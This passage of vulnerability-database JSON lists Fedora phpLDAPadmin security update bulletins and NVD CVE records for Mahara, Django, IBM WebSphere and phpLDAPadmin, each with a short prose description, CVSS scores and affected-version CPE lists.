/etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients.
", "cvss3": {}, "published": "2011-11-25T01:52:56", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: phpldapadmin-1.2.1.1-2.20111006git.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-25T01:52:56", "id": "FEDORA:6627020EBD", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PWRDH3BGAWZISS3STXZ4QP5Y3NH5OQOL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. 
", "cvss3": {}, "published": "2011-11-25T01:56:24", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: phpldapadmin-1.2.1.1-2.20111006git.fc14", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-25T01:56:24", "id": "FEDORA:559EA20CFA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2G3I5QLFDGXU3ON4NDE22OFWRI6Y6BND/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "PhpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP director y. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. PhpLDAPadmin is the perfect LDAP browser for the LDAP professional and novice alike. Its user base consists mostly of LDAP administration professionals. Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow access by remote web-clients. 
", "cvss3": {}, "published": "2011-11-25T02:05:42", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: phpldapadmin-1.2.1.1-2.20111006git.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-25T02:05:42", "id": "FEDORA:25B06216FB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KPKZ2UHHVUFOICJ7E37URQR5ORDUI354/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:15:55", "description": "The get_dataroot_image_path function in lib/file.php in Mahara before 1.4.1 does not properly validate uploaded image files, which allows remote attackers to cause a denial of service (memory consumption) via a (1) large or (2) invalid image.", "cvss3": {}, "published": "2011-11-15T03:57:00", "type": "cve", "title": "CVE-2011-2772", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2772"], "modified": "2012-03-12T04:00:00", "cpe": ["cpe:/a:mahara:mahara:1.3.1", 
"cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.0.8", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.1.4", "cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.1.2", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:0.9.0"], "id": "CVE-2011-2772", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2772", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:38", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4139", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2018-01-18T02:29:00", 
"cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4139", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:52:06", "description": "Directory traversal vulnerability in the administration console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41, 7.0 before 7.0.0.19, and 8.0 before 8.0.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.", "cvss3": {}, "published": "2011-09-06T15:55:00", "type": "cve", "title": "CVE-2011-1359", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1359"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:ibm:websphere_application_server:6.1.0.21", "cpe:/a:ibm:websphere_application_server:6.1.6", "cpe:/a:ibm:websphere_application_server:6.1.0", "cpe:/a:ibm:websphere_application_server:6.1.0.33", "cpe:/a:ibm:websphere_application_server:6.1", "cpe:/a:ibm:websphere_application_server:6.1.0.0", "cpe:/a:ibm:websphere_application_server:7.0.0.11", "cpe:/a:ibm:websphere_application_server:7.0.0.1", "cpe:/a:ibm:websphere_application_server:6.1.0.19", "cpe:/a:ibm:websphere_application_server:6.1.0.23", "cpe:/a:ibm:websphere_application_server:7.0.0.2", "cpe:/a:ibm:websphere_application_server:6.1.0.3", "cpe:/a:ibm:websphere_application_server:6.1.0.12", "cpe:/a:ibm:websphere_application_server:6.1.0.17", "cpe:/a:ibm:websphere_application_server:6.1.0.27", "cpe:/a:ibm:websphere_application_server:6.1.14", "cpe:/a:ibm:websphere_application_server:6.1.0.11", 
"cpe:/a:ibm:websphere_application_server:6.1.5", "cpe:/a:ibm:websphere_application_server:7.0.0.13", "cpe:/a:ibm:websphere_application_server:6.1.7", "cpe:/a:ibm:websphere_application_server:7.0.0.3", "cpe:/a:ibm:websphere_application_server:8.0.0.0", "cpe:/a:ibm:websphere_application_server:6.1.0.9", "cpe:/a:ibm:websphere_application_server:7.0.0.4", "cpe:/a:ibm:websphere_application_server:6.1.0.35", "cpe:/a:ibm:websphere_application_server:6.1.0.15", "cpe:/a:ibm:websphere_application_server:6.1.0.37", "cpe:/a:ibm:websphere_application_server:6.1.3", "cpe:/a:ibm:websphere_application_server:6.1.0.31", "cpe:/a:ibm:websphere_application_server:7.0.0.8", "cpe:/a:ibm:websphere_application_server:6.1.0.2", "cpe:/a:ibm:websphere_application_server:7.0.0.9", "cpe:/a:ibm:websphere_application_server:6.1.0.1", "cpe:/a:ibm:websphere_application_server:7.0.0.5", "cpe:/a:ibm:websphere_application_server:6.1.1", "cpe:/a:ibm:websphere_application_server:6.1.0.29", "cpe:/a:ibm:websphere_application_server:7.0.0.7", "cpe:/a:ibm:websphere_application_server:6.1.13", "cpe:/a:ibm:websphere_application_server:6.1.0.39", "cpe:/a:ibm:websphere_application_server:7.0.0.6", "cpe:/a:ibm:websphere_application_server:7.0.0.17", "cpe:/a:ibm:websphere_application_server:7.0", "cpe:/a:ibm:websphere_application_server:6.1.0.25", "cpe:/a:ibm:websphere_application_server:6.1.0.5", "cpe:/a:ibm:websphere_application_server:7.0.0.15", "cpe:/a:ibm:websphere_application_server:6.1.0.7"], "id": "CVE-2011-1359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1359", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:ibm:websphere_application_server:6.1.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:8.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:ibm:websphere_application_server:6.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:ibm:websphere_application_server:6.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:6.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:websphere_application_server:7.0.0.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:37", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4138", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", 
"cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4138", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", 
"cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:37:18", "description": "Cross-site scripting (XSS) vulnerability in cmd.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via an _debug command.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "cve", "title": "CVE-2011-4074", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074"], "modified": "2020-11-09T13:30:00", "cpe": ["cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.2", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.4", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.3", 